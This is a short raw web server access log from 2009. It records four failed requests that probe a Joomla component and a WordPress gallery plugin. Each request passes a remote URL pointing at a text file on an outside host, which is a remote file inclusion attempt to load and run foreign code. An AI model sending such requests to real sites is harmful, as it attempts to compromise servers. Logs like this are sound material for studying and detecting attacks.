98.129.217.53 - - [09/Nov/2009:01:19:25 -0800] "GET /logs/access_090316.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [09/Nov/2009:01:21:48 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [09/Nov/2009:01:21:48 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [09/Nov/2009:01:21:48 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
